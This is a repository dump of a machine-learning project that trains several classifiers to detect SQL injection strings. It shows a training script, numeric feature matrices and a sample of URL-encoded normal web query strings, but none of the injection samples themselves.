├── ML_for_SQL
├── .idea
│ ├── ML_for_SQL.iml
│ ├── inspectionProfiles
│ │ └── profiles_settings.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── workspace.xml
├── README
├── __pycache__
│ └── featurepossess.cpython-36.pyc
├── adaboost.py
├── data
│ ├── all_matrix.csv
│ ├── all_matrix.txt
│ ├── alltest_matrix.csv
│ ├── nor_matrix.csv
│ ├── normal_less.csv
│ ├── normal_test.csv
│ ├── nortest_matrix.csv
│ ├── sql_matrix.csv
│ ├── sql_test.csv
│ ├── sqlnew.csv
│ └── sqltest_matrix.csv
├── featurepossess.py
├── file
│ ├── Adaboost.model
│ ├── GBDT.model
│ ├── bys.model
│ ├── forestrandom.model
│ ├── knn.model
│ ├── lg.model
│ ├── svm.model
│ └── tree.model
├── sqlbys.py
├── sqlforestrandom.py
├── sqlkNN.py
├── sqllogistic.py
├── sqlsvm.py
├── sqltree.py
└── testsql.py
└── README.md
/ML_for_SQL/.idea/ML_for_SQL.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 | true
156 | DEFINITION_ORDER
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 | project
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 | 1523458935612
484 |
485 |
486 | 1523458935612
487 |
488 |
489 |
490 |
491 |
492 |
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 |
632 |
633 |
634 |
635 |
636 |
637 |
638 |
639 |
640 |
641 |
642 |
643 |
644 |
645 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
654 |
655 |
656 |
657 |
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 |
674 |
675 |
676 |
677 |
678 |
679 |
680 |
681 |
682 |
683 |
684 |
685 |
686 |
687 |
688 |
689 |
690 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 |
700 |
701 |
702 |
703 |
704 |
705 |
706 |
707 |
708 |
709 |
710 |
711 |
712 |
713 |
714 |
715 |
716 |
717 |
718 |
719 |
720 |
721 |
722 |
723 |
724 |
725 |
726 |
727 |
728 |
729 |
730 |
731 |
732 |
733 |
734 |
735 |
736 |
737 |
738 |
739 |
740 |
741 |
742 |
743 |
744 |
745 |
746 |
747 |
748 |
749 |
750 |
751 |
752 |
753 |
754 |
755 |
756 |
757 |
758 |
759 |
760 |
761 |
762 |
763 |
764 |
765 |
766 |
767 |
768 |
769 |
770 |
771 |
772 |
773 |
774 |
775 |
776 |
777 |
778 |
779 |
780 |
781 |
782 |
783 |
784 |
785 |
786 |
787 |
788 |
789 |
790 |
791 |
792 |
793 |
794 |
--------------------------------------------------------------------------------
/ML_for_SQL/README:
--------------------------------------------------------------------------------
1 | 本项目是使用机器学习算法来分类SQL注入语句与正常语句:
2 | 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。
3 | data是收集的样本数据
4 | file中存放的是训练好的各个模型
5 | featurepossess.py是对原始样本进行预处理,提特征。
6 | sqlsvm.py等py文件是训练模型
7 | testsql是对训练好的模型进行测试,用准确率来度量模型效果。
8 |
--------------------------------------------------------------------------------
/ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc
--------------------------------------------------------------------------------
/ML_for_SQL/adaboost.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | from sklearn import metrics
10 | from sklearn.tree import DecisionTreeClassifier
11 | from sklearn.ensemble import GradientBoostingClassifier
12 | from sklearn.ensemble import AdaBoostClassifier
13 | from sklearn.model_selection import train_test_split
14 | from featurepossess import generate
15 | from sklearn.externals import joblib
16 |
17 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
18 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
19 |
20 | df = pd.read_csv(sql_matrix)
21 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
22 | df = pd.read_csv( nor_matrix)
23 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
24 |
25 | feature_max = pd.read_csv('./data/all_matrix.csv')
26 | arr=feature_max.values
27 | data = np.delete(arr, -1, axis=1) #删除最后一列
28 | #print(arr)
29 | target=arr[:,7]
30 | #随机划分训练集和测试集
31 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3)
32 | #模型
33 | model1=DecisionTreeClassifier(max_depth=5)
34 | model2=GradientBoostingClassifier(n_estimators=100)
35 | model3=AdaBoostClassifier(model1,n_estimators=100)
36 | model1.fit(train_data,train_target)#训练模型
37 | model2.fit(train_data,train_target)#训练模型
38 | model3.fit(train_data,train_target)#训练模型
39 | joblib.dump(model2, './file/GBDT.model')#梯度提升书算法
40 | print("GBDT.model has been saved to 'file/GBDT.model'")
41 |
42 | joblib.dump(model3, './file/Adaboost.model')
43 | print("Adaboost.model has been saved to 'file/Adaboost.model'")
44 | #clf = joblib.load('svm.model')
45 | y_pred1=model2.predict(test_data)#预测
46 | print("y_pred:%s"%y_pred1)
47 | print("test_target:%s"%test_target)
48 | #Verify
49 | print("GBDT:")
50 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred1))#查全率
51 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred1))#查准率
52 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred1))#混淆矩阵
53 |
54 | y_pred2=model3.predict(test_data)#预测
55 | print("y_pred:%s"%y_pred2)
56 | print("test_target:%s"%test_target)
57 | #Verify
58 | print("Adaboost:")
59 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred2))#查全率
60 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred2))#查准率
61 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred2))#混淆矩阵
62 |
63 |
64 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/all_matrix.txt:
--------------------------------------------------------------------------------
1 | 56.000000,0.000000,0.000000,0.089286,0.160714,0.035714,0.000000,1.000000
2 | 31.000000,0.000000,0.000000,0.032258,0.129032,0.000000,0.000000,1.000000
3 | 30.000000,0.000000,0.000000,0.066667,0.133333,0.033333,0.000000,1.000000
4 | 75.000000,0.000000,0.000000,0.026667,0.093333,0.013333,0.000000,1.000000
5 | 61.000000,0.000000,0.000000,0.065574,0.147541,0.000000,0.000000,1.000000
6 | 112.000000,0.000000,0.508929,0.008929,0.071429,0.008929,0.000000,1.000000
7 | 28.000000,0.000000,0.000000,0.000000,0.035714,0.035714,0.000000,1.000000
8 | 64.000000,0.000000,0.015625,0.031250,0.125000,0.015625,0.000000,1.000000
9 | 62.000000,0.000000,0.000000,0.112903,0.032258,0.000000,0.000000,1.000000
10 | 29.000000,0.000000,0.000000,0.000000,0.172414,0.000000,0.034483,1.000000
11 | 43.000000,0.000000,0.000000,0.023256,0.093023,0.023256,0.000000,1.000000
12 | 107.000000,0.000000,0.000000,0.018692,0.130841,0.037383,0.000000,1.000000
13 | 48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000
14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000
15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000
16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000
17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000
18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000
19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000
20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000
21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000
22 | 68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000
23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000
24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000
25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000
26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000
27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000
28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000
29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000
30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000
31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000
32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000
33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000
34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000
35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000
37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000
38 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000
40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000
41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000
42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000
43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000
44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000
45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000
46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000
47 | 27.000000,0.000000,0.074074,0.222222,0.000000,0.000000,0.000000,1.000000
48 | 14.000000,0.000000,0.000000,0.142857,0.142857,0.071429,0.000000,1.000000
49 | 6.000000,0.000000,0.333333,0.333333,0.166667,0.166667,0.000000,1.000000
50 | 17.000000,0.000000,0.470588,0.235294,0.176471,0.117647,0.000000,1.000000
51 | 12.000000,0.000000,0.583333,0.083333,0.166667,0.000000,0.000000,1.000000
52 | 83.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
53 | 0.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
54 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000
55 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000
56 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000
57 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000
58 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000
59 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000
60 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000
61 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000
62 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000
63 | 35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000
64 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000
65 | 94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000
66 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000
67 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000
68 | 591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000
69 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000
70 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000
71 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000
72 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000
73 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000
74 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/alltest_matrix.csv:
--------------------------------------------------------------------------------
1 | 56.000000,0.000000,0.000000.1,0.089286,0.160714,0.035714,0.000000.2,1.000000
2 | 31.0,0.0,0.0,0.032257999999999995,0.12903199999999998,0.0,0.0,1.0
3 | 30.0,0.0,0.0,0.06666699999999999,0.13333299999999998,0.033333,0.0,1.0
4 | 75.0,0.0,0.0,0.026667000000000003,0.093333,0.013333000000000001,0.0,1.0
5 | 61.0,0.0,0.0,0.06557400000000001,0.147541,0.0,0.0,1.0
6 | 112.0,0.0,0.508929,0.008929000000000001,0.07142899999999999,0.008929000000000001,0.0,1.0
7 | 28.0,0.0,0.0,0.0,0.035713999999999996,0.035713999999999996,0.0,1.0
8 | 64.0,0.0,0.015625,0.03125,0.125,0.015625,0.0,1.0
9 | 62.0,0.0,0.0,0.112903,0.032257999999999995,0.0,0.0,1.0
10 | 29.0,0.0,0.0,0.0,0.172414,0.0,0.034483,1.0
11 | 43.0,0.0,0.0,0.023256,0.09302300000000001,0.023256,0.0,1.0
12 | 107.0,0.0,0.0,0.018692,0.130841,0.037383,0.0,1.0
13 | 48.0,0.0,0.0,0.083333,0.145833,0.020833,0.0,1.0
14 | 109.0,0.0,0.165138,0.045872,0.10091699999999999,0.027523000000000002,0.0,1.0
15 | 22.0,0.0,0.090909,0.090909,0.0,0.0,0.0,1.0
16 | 142.0,0.0,0.197183,0.119718,0.06337999999999999,0.028169,0.0,1.0
17 | 26.0,0.0,0.153846,0.0,0.0,0.0,0.0,1.0
18 | 124.0,0.0,0.225806,0.120968,0.048387,0.032257999999999995,0.0,1.0
19 | 52.0,0.0,0.307692,0.038462,0.038462,0.019231,0.0,1.0
20 | 52.0,0.0,0.0,0.0,0.076923,0.0,0.0,1.0
21 | 39.0,0.0,0.0,0.05128200000000001,0.153846,0.0,0.0,1.0
22 | 68.0,0.0,0.014706,0.029412,0.147059,0.0,0.0,1.0
23 | 49.0,0.0,0.0,0.081633,0.10204099999999999,0.0,0.0,1.0
24 | 55.0,0.0,0.0,0.0,0.072727,0.0,0.0,1.0
25 | 40.0,0.0,0.0,0.075,0.15,0.0,0.0,1.0
26 | 109.0,0.0,0.027523000000000002,0.055046000000000005,0.15596300000000002,0.018349,0.0,1.0
27 | 93.0,0.0,0.11828,0.032257999999999995,0.075269,0.010753,0.0,1.0
28 | 52.0,0.0,0.173077,0.019231,0.076923,0.019231,0.0,1.0
29 | 55.0,0.0,0.163636,0.036364,0.10909100000000001,0.018182,0.0,1.0
30 | 45.0,0.0,0.0,0.0,0.088889,0.0,0.0,1.0
31 | 50.0,0.0,0.08,0.0,0.1,0.0,0.0,1.0
32 | 115.0,0.0,0.034783,0.0,0.12173900000000001,0.0,0.0,1.0
33 | 40.0,0.0,0.0,0.0,0.2,0.0,0.0,1.0
34 | 27.0,0.0,0.0,0.148148,0.074074,0.0,0.0,1.0
35 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0
36 | 64.0,0.0,0.0,0.015625,0.109375,0.0,0.0,1.0
37 | 54.0,0.0,0.0,0.0,0.12963,0.018519,0.0,1.0
38 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0
39 | 81.0,0.0,0.0,0.012346,0.08642000000000001,0.0,0.0,1.0
40 | 51.0,0.0,0.078431,0.0,0.117647,0.019608,0.0,1.0
41 | 48.0,0.0,0.0,0.0,0.083333,0.0,0.0,1.0
42 | 52.0,0.0,0.076923,0.0,0.11538499999999999,0.0,0.0,1.0
43 | 43.0,0.0,0.0,0.069767,0.09302300000000001,0.0,0.0,1.0
44 | 108.0,0.0,0.037037,0.083333,0.12963,0.0,0.0,1.0
45 | 284.0,0.0,0.028169,0.042254,0.137324,0.0,0.0,1.0
46 | 9.0,0.0,0.0,0.333333,0.0,0.11111099999999999,0.0,1.0
47 | 27.0,0.0,0.074074,0.22222199999999998,0.0,0.0,0.0,1.0
48 | 14.0,0.0,0.0,0.14285699999999998,0.14285699999999998,0.07142899999999999,0.0,1.0
49 | 6.0,0.0,0.333333,0.333333,0.166667,0.166667,0.0,1.0
50 | 17.0,0.0,0.470588,0.235294,0.17647100000000002,0.117647,0.0,1.0
51 | 12.0,0.0,0.583333,0.083333,0.166667,0.0,0.0,1.0
52 | 83.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0
53 | 0.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0
54 | 81.0,0.0,0.061728,0.493827,0.0,0.0,0.08642000000000001,0.0
55 | 38.0,0.0,0.052632000000000005,0.605263,0.0,0.0,0.078947,0.0
56 | 495.0,0.0,0.367677,0.20202,0.0,0.0,0.018182,0.0
57 | 18.0,0.0,0.055555999999999994,0.833333,0.0,0.0,0.055555999999999994,0.0
58 | 12.0,0.0,0.083333,0.75,0.0,0.0,0.083333,0.0
59 | 22.0,0.0,0.318182,0.590909,0.0,0.0,0.090909,0.0
60 | 318.0,0.0,0.075472,0.41509399999999996,0.0,0.0,0.10691800000000001,0.0
61 | 108.0,0.0,0.083333,0.583333,0.0,0.0,0.083333,0.0
62 | 35.0,0.0,0.05714299999999999,0.657143,0.0,0.0,0.085714,0.0
63 | 48.0,0.0,0.083333,0.375,0.0,0.0,0.083333,0.0
64 | 94.0,0.0,0.265957,0.56383,0.0,0.0,0.10638299999999999,0.0
65 | 39.0,0.0,0.025641000000000004,0.230769,0.0,0.0,0.025641000000000004,0.0
66 | 33.0,0.0,0.151515,0.515152,0.0,0.0,0.090909,0.0
67 | 591.0,0.0,0.115059,0.407783,0.0,0.0033840000000000003,0.101523,0.0
68 | 273.0,0.0,0.07326,0.479853,0.0,0.0,0.12820499999999999,0.0
69 | 964.0,0.0,0.060166,0.40975100000000003,0.0,0.0,0.099585,0.0
70 | 358.0,0.0,0.083799,0.550279,0.002793,0.0,0.106145,0.0
71 | 524.0,0.0,0.188931,0.35686999999999997,0.0,0.0,0.177481,0.0
72 | 119.0,0.0,0.294118,0.218487,0.0,0.0,0.159664,0.0
73 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/normal_test.csv:
--------------------------------------------------------------------------------
1 | _%3D1498591621808
2 | code%3Dzs_000001%2Czs_399001%2Czs_399006%26cb%3Dfortune_hq_cn%26_%3D1498591852632
3 | _%3D1498591951848%26list%3Dml_sh600030
4 | 6053%26ri%3Dzb6-00f%7E-04gUry-01h-0RC%26tn%3D1%26en%3D4L9RATiSWJ84cSXYcX1d2pqRNDaJDyf4dP2hUCLUFiZhTaWU7eK5dl5slq5E7SVvDi63oAKGfcJUNiy27jClo3XeVPICvXbMtyQIUjoFYYlnKQp0XlF0M2zO7d7ub-vumAdasuEscaZLfT5w2tfIKsHlHIn49b0u1Af1JUmZeCeIVpuTgEmDmxYz9GkgA-CCk-qVMZ-V2AfzTEe7HCLcljdw1NcVt-H26P2-dz8IEEj3n9DdQGwpErgkGR6SSbaJpPQu0IgaWmPZEZu-umlvd0urhn88rdu9-Dmn4hYWD2T-menxBL9BSplyy74mnP_4DZXvZ4Ggf4n-k6WXtWPDQYekUxo6XItLiBIOTt5znJ4l9AfspnGY604PtLC0WKwyjqwq27Z4zR9JZsSXxngF9UJFi9JrCW_yldU07E3r3q9LuHrEoy8%3E%3E
5 | b1498592370545%3D1
6 | v%3D13111002
7 | COLLCC%3D3442798258%26
8 | t%3Dcheck%26rec%3Dstratus%26etyp%3Dconnect%26zone%3Dzibo5_cnc%26url%3D119.188.143.32%26errCnt%3D327%26uid%3Dd0a47beafc75e1549c7fdc23530fd959%26uif%3DCNC%7CBeiJing-114.251.186.13%26tvid%3D7706069409%26defi%3D2%26dlod%3D1%26darea%3D1%26ppapi%3Dfalse%26trkip%3D119.188.143.32%26trkon%3D0%26ver%3D3.1.0.15%26dur%3D36431783
9 | cn_600022%2Ccn_600516%2Ccn_000002%2Ccn_600519%2Ccn_000651%2Ccn_600887%2Ccn_002415%2Ccn_601288%2Ccn_000333%2C
10 | _%3D1498179095094%26list%3Dsh600030
11 | q%3DmarketStat%2Cstdunixtime%26_%3D1498584939540
12 | _%3D1498584888937/%26list%3DFU1804%2CFU0%2CFU1707%2CFU1708%2CFU1709%2CFU1710%2CFU1711%2CFU1712
13 | callback%3D_ntes_quote_callback54388229
14 | _%3D1498552987540%26list%3Dhf_OIL
15 | prod%3D56%26systype%3D0%26cid%3D4%26log%3Dact%26from%3D3%263th%3D0%26adTime%3D0%26adType%3Dswf%26dmpt%3Dpad%26po%3Db%26adUrl%3Dhttp%3A//images.sohu.com/ytv/BJ/BJSC/400300201512181625132.swf%26type%3D1%26du%3D500%26al%3D-4%26out%3D0%26au%3D1%26vid%3D130369828%26qd%3Dabbdd136abdb8172%26rt%3D5fd0898fd5ebcf4096145bd7eb4f0bd5%26uv%3D14985797034557443254%26uuid%3D39f371e0-c882-9cdd-fdd7-ea98faf2f9e3%26vt%3D56flash%26rd%3Dwww.56.com%26isIf%3D0%26suv%3D1706280006344804%26uid%3D14985797034557443254%26scookie%3D2%26bad%3D3%26sign%3DTA3ccJAWUeypt831iciWkCbZaSRfhUcmDUDcQDBQDj_tpUXIMgFg-X4ku%3E%3E
16 | tu%3Du1889066%26op%3D1%26jk%3Da014e4716ffd54c4%26word%3Dhttp%3A//www.39yst.com/tieshi/yinshi/481666_2.shtml%26if%3D0%26aw%3D670%26ah%3D90%26pt%3D20500%26it%3D0%26vt%3D0%26csp%3D1024%2C738%26bcl%3D1007%2C624%26pof%3D1007%2C4516%26top%3D3776%26left%3D14%26rdm%3D1498585089587
17 | flag%3Dplyract%26plyract%3Dtiming%26prgr%3D75%26lostfrm%3D13%26lostfrmsec%3D1%26tl%3D60%26src%3D%26purl%3Dhttp%3A//www.iqiyi.com/v_19rr7sryv0.html%23curid%3D710171500_9128e16fccd25dd00ca053a1da504df3%26rfr%3Dhttp%3A//www.iqiyi.com/a_19rrhalt31.html%26lrfr%3Dhttps%3A//www.2345.com/%3Fkbox73713266%26aid%3D203965201%26tvid%3D710171500%26vid%3D284da491e1954fe385336e0054af677f%26cid%3D10%26lev%3D96%26puid%3D%26pru%3D%26veid%3D0f37150b10b8d342bb591c2611b35b41%26weid%3D32c87fb9fc3345fec7cace29952f950d%26newusr%3D0%26pla%3D11%26visits%3D%26sttntp%3D0%26plyrtp%3D0%26plyrver%3D3.3.12.22%26z%3Dqingdao4_cmnet%26suid%3D3911317fef78e8c179aef11a83c22c15%26diaoduuip%3DCMNET%7CBeiJing-218.205.147.2%26plid%3D%26vvfrom%3D%26vfrm%3D10-2-0-1%26vfm%3D%26restp%3D2%26ispur%3D0%26as%3D0ffa7999c6c7c070df03efccc58a6ec3%26qdv%3D2%26bstp%3D6%26isdm%3D0%26isstar%3D0%26hu%3D%26mod%3Dcn_s%26videotp%3D0%26stime%3D1498585048072%26server_ip%3D120.221.22.137%26tn%3D0.021188411861658096
18 | s%3D1498585170292%26y%3Dqc_100001_100015%26e%3D1c37a278a281ec7359f4b0a8e75afe92%26g%3D0%26rd%3D2052%26ps%3D0%26h%3D0%26rc%3D1%26c%3D10%26b%3D203965201%26d%3D71%26a%3D16b34fd092c694bc28eebd634829bc83%26l%3DMTA2LjM3LjIwNC4y%26p%3Ds%26av%3DAdManager%204.0.9%26rid%3Df15a9d21816f582f28fa242f983226dd%26vv%3D5.3.2.67%26t%3Ds%26u%3D3911317fef78e8c179aef11a83c22c15
